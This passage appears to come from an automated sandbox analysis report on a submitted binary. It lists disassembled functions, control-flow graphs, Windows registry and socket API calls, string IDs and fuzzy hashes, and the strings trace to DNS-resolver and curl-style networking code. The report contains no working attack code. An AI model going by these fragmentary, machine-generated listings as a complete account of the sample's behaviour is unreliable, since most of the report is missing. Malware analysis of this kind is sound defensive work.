1836->1795 1840 39b2e3 1836->1840 1841 39b4a9-39b4b1 call 39b660 1838->1841 1842 39b4b3-39b4cb call 39b660 1838->1842 1839->1800 1840->1825 1841->1842 1847 39b4d9-39b4f5 call 39b660 1842->1847 1848 39b4cd-39b4d5 call 39b660 1842->1848 1853 39b50d-39b52b call 39b770 * 2 1847->1853 1854 39b4f7-39b50b 1847->1854 1848->1847 1853->1800 1859 39b52d-39b531 1853->1859 1854->1800 1860 39b580 1859->1860 1861 39b533-39b53b 1859->1861 1860->1800 1862 39b578-39b57e 1861->1862 1863 39b53d-39b547 1861->1863 1862->1800 1863->1862 1864 39b549-39b54d 1863->1864 1864->1862 1865 39b54f-39b558 1864->1865 1865->1862 1866 39b55a-39b576 call 39b870 * 2 1865->1866 1866->1800 1866->1862
                                    APIs
                                    • getsockname.WS2_32(-00000020,-00000020,?), ref: 0039B2B6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                    • Associated: 00000000.00000002.1605461188.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.0000000000A16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605995928.0000000000A1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000A1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000CBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000CBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000D9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000DA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606362172.0000000000DB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606489988.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606506723.0000000000F76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606522019.0000000000F77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606538018.0000000000F78000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: getsockname
                                    • String ID: ares__sortaddrinfo.c$cur != NULL
                                    • API String ID: 3358416759-2430778319
                                    • Opcode ID: fa92253e290be236cac3304618de219c25342cbd177539af62483c9bc0025d6d
                                    • Instruction ID: 48ffb71249ec18f14bdda6164a6097f3182345e213cfee0486b0866558bc0bab
                                    • Opcode Fuzzy Hash: fa92253e290be236cac3304618de219c25342cbd177539af62483c9bc0025d6d
                                    • Instruction Fuzzy Hash: EDC171316043159FDB19DF24DA80A6AB7E1FF89704F06896CF8898B3A1D730ED45CB81
                                    Function 0039A8C0 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                    Download Yara Rule
                                    APIs
                                    • recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,0038712E,?,?,?,00001001,00000000), ref: 0039A90D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                    • Associated: 00000000.00000002.1605461188.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.0000000000A16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605995928.0000000000A1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000A1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000CBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000CBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000D9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000DA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606362172.0000000000DB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606489988.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606506723.0000000000F76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606522019.0000000000F77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606538018.0000000000F78000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: recvfrom
                                    • String ID:
                                    • API String ID: 846543921-0
                                    • Opcode ID: d3bdf1837bb3cc0f2a1d128bdc7033975b2852ffe41a8c9d996ea64f2792ebe1
                                    • Instruction ID: d7c726fa1606c00f83c80b9c1a384acd5aecdfe9c411ccae66dc7106606f633c
                                    • Opcode Fuzzy Hash: d3bdf1837bb3cc0f2a1d128bdc7033975b2852ffe41a8c9d996ea64f2792ebe1
                                    • Instruction Fuzzy Hash: D1F06D7511830CAFD6109E01DC44D6BBBEDFFC9768F06465DF948232118370AE10DAB2
                                    Function 0038A440 Relevance: 48.3, APIs: 19, Strings: 8, Instructions: 1066registryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 0038AA19
                                    • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0038AA4C
                                    • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 0038AA97
                                    • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0038AAE9
                                    • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0038AB30
                                    • RegCloseKey.KERNELBASE(?), ref: 0038AB6A
                                    • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 0038AB82
                                    • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 0038AC46
                                    • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 0038AD0A
                                    • RegEnumKeyExA.KERNELBASE ref: 0038AD8D
                                    • RegCloseKey.KERNELBASE(?), ref: 0038ADD9
                                    • RegEnumKeyExA.KERNELBASE ref: 0038AE08
                                    • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 0038AE2A
                                    • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0038AE54
                                    • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0038AF63
                                    • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0038AFB2
                                    • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 0038B072
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                    • Associated: 00000000.00000002.1605461188.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.0000000000A16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605995928.0000000000A1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000A1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000CBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000CBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000D9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000DA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606362172.0000000000DB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606489988.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606506723.0000000000F76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606522019.0000000000F77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606538018.0000000000F78000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: QueryValue$Open$CloseEnum
                                    • String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
                                    • API String ID: 4217438148-1047472027
                                    • Opcode ID: 2589684b3008450cc199f3ebfcf777fdcd495cee12a15bcc6bbc4b59e7943f1a
                                    • Instruction ID: 4909ce687eff76f6906d26098de8e3169ab2e4ea577ec319399c4553d204cb67
                                    • Opcode Fuzzy Hash: 2589684b3008450cc199f3ebfcf777fdcd495cee12a15bcc6bbc4b59e7943f1a
                                    • Instruction Fuzzy Hash: 6D72EFB1608301AFE711EB24CC82F6BB7E8AF85740F154829F985DB291E774E945CB63
                                    Function 0030A550 Relevance: 28.8, APIs: 1, Strings: 15, Instructions: 794COMMON
                                    Download Yara Rule
                                    APIs
                                    • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 0030A831
                                    Strings
                                    • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 0030AD0A
                                    • @, xrefs: 0030A8F4
                                    • Couldn't bind to '%s' with errno %d: %s, xrefs: 0030AE1F
                                    • bind failed with errno %d: %s, xrefs: 0030B080
                                    • cf_socket_open() -> %d, fd=%d, xrefs: 0030A796
                                    • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 0030A6CE
                                    • Name '%s' family %i resolved to '%s' family %i, xrefs: 0030ADAC
                                    • Trying %s:%d..., xrefs: 0030A7C2, 0030A7DE
                                    • Bind to local port %d failed, trying next, xrefs: 0030AFE5
                                    • Trying [%s]:%d..., xrefs: 0030A689
                                    • Local port: %hu, xrefs: 0030AF28
                                    • Local Interface %s is ip %s using address family %i, xrefs: 0030AE60
                                    • cf-socket.c, xrefs: 0030A5CD, 0030A735
                                    • Could not set TCP_NODELAY: %s, xrefs: 0030A871
                                    • @, xrefs: 0030AC42
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                    • Associated: 00000000.00000002.1605461188.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.0000000000A16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605995928.0000000000A1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000A1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000CBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000CBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000D9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000DA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606362172.0000000000DB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606489988.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606506723.0000000000F76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606522019.0000000000F77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606538018.0000000000F78000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: setsockopt
                                    • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                    • API String ID: 3981526788-2373386790
                                    • Opcode ID: 61deb92ed99163a6225bcb0bad53967d8c270c1c1ffc4e0a427f9dfdcb69cb16
                                    • Instruction ID: b68b3fe2b4e50aa2f172533e5e9ccca74c8d5e16b7eeab4be3b16400b0bb88ea
                                    • Opcode Fuzzy Hash: 61deb92ed99163a6225bcb0bad53967d8c270c1c1ffc4e0a427f9dfdcb69cb16
                                    • Instruction Fuzzy Hash: 79620371509741ABE722CF24D852FABB3E8FF85304F054929F98897292E771E845CB93
                                    Function 00399740 Relevance: 16.5, APIs: 3, Strings: 6, Instructions: 743registryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 966 399740-39975b 967 39975d-399768 call 3978a0 966->967 968 399780-399782 966->968 976 3999bb-3999c0 967->976 977 39976e-399770 967->977 970 399788-3997a0 call 658e00 call 3978a0 968->970 971 399914-39994e call 658b70 RegOpenKeyExA 968->971 970->976 982 3997a6-3997c5 970->982 979 39995a-399992 RegQueryValueExA RegCloseKey call 658b98 971->979 980 399950-399955 971->980 983 399a0c-399a15 976->983 981 399772-39977e 977->981 977->982 996 399997-3999b5 call 3978a0 979->996 980->983 981->970 989 399827-399833 982->989 990 3997c7-3997e0 982->990 992 39985f-399872 call 395ca0 989->992 993 399835-39985c call 38e2b0 * 2 989->993 994 3997e2-3997f3 call 658b50 990->994 995 3997f6-399809 990->995 1007 399878-39987d call 3977b0 992->1007 1008 3999f0 992->1008 993->992 994->995 995->989 1006 39980b-399810 995->1006 996->976 996->982 1006->989 1011 399812-399822 1006->1011 1015 399882-399889 1007->1015 1010 3999f5-3999fb call 395d00 1008->1010 1021 3999fe-399a09 1010->1021 1011->983 1015->1010 1019 39988f-39989b call 384fe0 1015->1019 1019->1008 1024 3998a1-3998c3 call 658b50 call 3978a0 1019->1024 1021->983 1030 3998c9-3998db call 38e2d0 1024->1030 1031 3999c2-3999ed call 38e2b0 * 2 1024->1031 1030->1031 1036 3998e1-3998f0 call 38e2d0 1030->1036 1031->1008 1036->1031 1042 3998f6-399905 call 3963f0 1036->1042 1046 39990b-39990f 1042->1046 1047 399f66-399f7f call 395d00 1042->1047 1048 399a3f-399a5a call 396740 call 3963f0 1046->1048 1047->1021 1048->1047 1055 399a60-399a6e call 396d60 1048->1055 1058 399a1f-399a39 call 396840 call 3963f0 1055->1058 1059 399a70-399a94 call 396200 call 3967e0 call 396320 1055->1059 1058->1047 1058->1048 1070 399a16-399a19 1059->1070 1071 399a96-399ac6 call 38d120 1059->1071 1070->1058 1073 399fc1 1070->1073 1076 399ac8-399adb call 38d120 1071->1076 1077 399ae1-399af7 call 38d190 1071->1077 1075 399fc5-399ffd call 395d00 call 38e2b0 * 2 1073->1075 1075->1021 1076->1058 1076->1077 1077->1058 1085 399afd-399b09 call 384fe0 1077->1085 1085->1073 1091 399b0f-399b29 call 38e730 1085->1091 1095 399b2f-399b3a call 3978a0 1091->1095 1096 399f84-399f88 1091->1096 1095->1096 1103 399b40-399b54 call 38e760 1095->1103 1098 399f95-399f99 1096->1098 1100 399f9b-399f9e 1098->1100 1101 399fa0-399fb6 call 38ebf0 * 2 1098->1101 1100->1073 1100->1101 1113 399fb7-399fbe 1101->1113 1109 399f8a-399f92 1103->1109 1110 399b5a-399b6e call 38e730 1103->1110 1109->1098 1116 399b8c-399b97 call 3963f0 1110->1116 1117 399b70-39a004 1110->1117 1113->1073 1123 399c9a-399cab call 38ea00 1116->1123 1124 399b9d-399bbf call 396740 call 3963f0 1116->1124 1122 39a015-39a01d 1117->1122 1125 39a01f-39a022 1122->1125 1126 39a024-39a045 call 38ebf0 * 2 1122->1126 1135 399f31-399f35 1123->1135 1136 399cb1-399ccd call 38ea00 call 38e960 1123->1136 1124->1123 1143 399bc5-399bda call 396d60 1124->1143 1125->1075 1125->1126 1126->1075 1138 399f40-399f61 call 38ebf0 * 2 1135->1138 1139 399f37-399f3a 1135->1139 1152 399cfd-399d0e call 38e960 1136->1152 1153 399ccf 1136->1153 1138->1058 1139->1058 1139->1138 1143->1123 1155 399be0-399bf4 call 396200 call 3967e0 1143->1155 1164 399d10 1152->1164 1165 399d53-399d55 1152->1165 1156 399cd1-399cec call 38e9f0 call 38e4a0 1153->1156 1155->1123 1174 399bfa-399c0b call 396320 1155->1174 1176 399cee-399cfb call 38e9d0 1156->1176 1177 399d47-399d51 1156->1177 1169 399d12-399d2d call 38e9f0 call 38e4a0 1164->1169 1168 399e69-399e8e call 38ea40 call 38e440 1165->1168 1194 399e90-399e92 1168->1194 1195 399e94-399eaa call 38e3c0 1168->1195 1191 399d5a-399d6f call 38e960 1169->1191 1192 399d2f-399d3c call 38e9d0 1169->1192 1186 399c11-399c1c call 397b70 1174->1186 1187 399b75-399b86 call 38ea00 1174->1187 1176->1152 1176->1156 1183 399dca-399ddb call 38e960 1177->1183 1204 399ddd-399ddf 1183->1204 1205 399e2e-399e36 1183->1205 1186->1116 1208 399c22-399c33 call 38e960 1186->1208 1187->1116 1213 399f2d 1187->1213 1222 399d71-399d73 1191->1222 1223 399dc2 1191->1223 1192->1169 1219 399d3e-399d42 1192->1219 1201 399eb3-399ec4 call 38e9c0 1194->1201 1216 39a04a-39a04c 1195->1216 1217 399eb0-399eb1 1195->1217 1201->1058 1226 399eca-399ed0 1201->1226 1214 399e06-399e21 call 38e9f0 call 38e4a0 1204->1214 1210 399e38-399e3b 1205->1210 1211 399e3d-399e5b call 38ebf0 * 2 1205->1211 1235 399c35 1208->1235 1236 399c66-399c75 call 3978a0 1208->1236 1210->1211 1224 399e5e-399e67 1210->1224 1211->1224 1213->1135 1250 399de1-399dee call 38ec80 1214->1250 1251 399e23-399e2c call 38eac0 1214->1251 1229 39a04e-39a051 1216->1229 1230 39a057-39a070 call 38ebf0 * 2 1216->1230 1217->1201 1219->1168 1231 399d9a-399db5 call 38e9f0 call 38e4a0 1222->1231 1223->1183 1224->1168 1224->1201 1234 399ee5-399ef2 call 38e9f0 1226->1234 1229->1073 1229->1230 1230->1113 1264 399d75-399d82 call 38ec80 1231->1264 1265 399db7-399dc0 call 38eac0 1231->1265 1234->1058 1258 399ef8-399f0e call 38e440 1234->1258 1243 399c37-399c51 call 38e9f0 1235->1243 1254 399c7b-399c8f call 38e7c0 1236->1254 1255 39a011 1236->1255 1243->1116 1280 399c57-399c64 call 38e9d0 1243->1280 1268 399df1-399e04 call 38e960 1250->1268 1251->1268 1254->1116 1275 399c95-39a00e 1254->1275 1255->1122 1278 399f10-399f26 call 38e3c0 1258->1278 1279 399ed2-399edf call 38e9e0 1258->1279 1284 399d85-399d98 call 38e960 1264->1284 1265->1284 1268->1205 1268->1214 1275->1255 1278->1279 1292 399f28 1278->1292 1279->1058 1279->1234 1280->1236 1280->1243 1284->1223 1284->1231 1292->1073
                                    APIs
                                    • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00399946
                                    • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 00399974
                                    • RegCloseKey.KERNELBASE(?), ref: 0039998B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                    • Associated: 00000000.00000002.1605461188.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.0000000000A16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605995928.0000000000A1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000A1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000CBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000CBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000D9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000DA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606362172.0000000000DB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606489988.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606506723.0000000000F76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606522019.0000000000F77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606538018.0000000000F78000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: CloseOpenQueryValue
                                    • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos
                                    • API String ID: 3677997916-615551945
                                    • Opcode ID: 5e7783527b547a2a82ca48e8012dc40cf44bc79def49e7d6d46048f8a7b3473c
                                    • Instruction ID: ef1e632ea9d6a4743ac495ed772c1f2fb83fce5bbdfffa10d469cbb9ef58f291
                                    • Opcode Fuzzy Hash: 5e7783527b547a2a82ca48e8012dc40cf44bc79def49e7d6d46048f8a7b3473c
                                    • Instruction Fuzzy Hash: FF32A6B5904301ABEF13AB28EC42B1B7698AF55354F094879FC099A263F731ED15C793
                                    Function 00308B50 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 269networkCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1387 308b50-308b69 1388 308be6 1387->1388 1389 308b6b-308b74 1387->1389 1390 308be9 1388->1390 1391 308b76-308b8d 1389->1391 1392 308beb-308bf2 1389->1392 1390->1392 1393 308bf3-308bfe call 30a550 1391->1393 1394 308b8f-308ba7 call 2e6e40 1391->1394 1401 308de4-308def 1393->1401 1402 308c04-308c08 1393->1402 1399 308cd9-308d16 SleepEx 1394->1399 1400 308bad-308baf 1394->1400 1421 308d22 1399->1421 1422 308d18-308d20 1399->1422 1405 308bb5-308bb9 1400->1405 1406 308ca6-308cb0 1400->1406 1403 308df5-308e19 call 30a150 1401->1403 1404 308e8c-308e95 1401->1404 1407 308dbd-308dc3 1402->1407 1408 308c0e-308c1d 1402->1408 1443 308e88 1403->1443 1444 308e1b-308e26 1403->1444 1413 308f00-308f06 1404->1413 1414 308e97-308e9c 1404->1414 1405->1392 1411 308bbb-308bc2 1405->1411 1406->1399 1409 308cb2-308cb8 1406->1409 1407->1390 1415 308c35-308c48 call 30a150 1408->1415 1416 308c1f-308c30 connect 1408->1416 1417 308ddc-308dde 1409->1417 1418 308cbe-308cd4 call 30b180 1409->1418 1411->1392 1420 308bc4-308bcc 1411->1420 1413->1392 1423 308e9e-308eb6 call 2e2a00 1414->1423 1424 308edf-308eef call 2d78b0 1414->1424 1442 308c4d-308c4f 1415->1442 1416->1415 1417->1390 1417->1401 1418->1401 1428 308bd4-308bda 1420->1428 1429 308bce-308bd2 1420->1429 1431 308d26-308d39 1421->1431 1422->1431 1423->1424 1441 308eb8-308edd call 2e3410 * 2 1423->1441 1446 308ef2-308efc 1424->1446 1428->1392 1436 308bdc-308be1 1428->1436 1429->1392 1429->1428 1439 308d43-308d61 call 2ed8c0 call 30a150 1431->1439 1440 308d3b-308d3d 1431->1440 1445 308dac-308db8 call 3150a0 1436->1445 1462 308d66-308d74 1439->1462 1440->1417 1440->1439 1441->1446 1449 308c51-308c58 1442->1449 1450 308c8e-308c93 1442->1450 1443->1404 1451 308e28-308e2c 1444->1451 1452 308e2e-308e85 call 2ed090 call 314fd0 1444->1452 1445->1392 1446->1413 1449->1450 1457 308c5a-308c62 1449->1457 1460 308dc8-308dd9 call 30b100 1450->1460 1461 308c99-308c9f 1450->1461 1451->1443 1451->1452 1452->1443 1463 308c64-308c68 1457->1463 1464 308c6a-308c70 1457->1464 1460->1417 1461->1406 1462->1392 1467 308d7a-308d81 1462->1467 1463->1450 1463->1464 1464->1450 1469 308c72-308c8b call 3150a0 1464->1469 1467->1392 1472 308d87-308d8f 1467->1472 1469->1450 1476 308d91-308d95 1472->1476 1477 308d9b-308da1 1472->1477 1476->1392 1476->1477 1477->1392 1480 308da7 1477->1480 1480->1445
                                    APIs
                                    • connect.WS2_32(?,?,00000001), ref: 00308C30
                                    • SleepEx.KERNELBASE(00000000,00000000), ref: 00308CF3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                    • Associated: 00000000.00000002.1605461188.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.0000000000A16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605995928.0000000000A1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000A1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000CBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000CBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000D9F000.00000040.00000001.01000000.00000003.sdmpDownload File
